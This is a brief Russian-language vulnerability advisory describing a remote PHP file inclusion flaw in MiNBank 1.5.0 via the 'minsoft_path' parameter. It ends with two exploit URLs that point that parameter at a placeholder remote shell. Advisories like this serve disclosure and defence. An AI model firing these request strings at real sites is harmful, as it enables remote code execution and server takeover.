Программа: MiNBank 1.5.0
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «minsoft_path» сценариями utdb_access.php и
utgn_message.php. Удаленный пользователь может выполнить произвольный PHP
сценарий на целевой системе с привилегиями Web сервера.
Эксплоит:
http://site.com/minba/utility/utdb_access.php?minsoft_path=Shellz?
http://site.com/minba/utility/utgn_message.php?minsoft_path=Shellz?
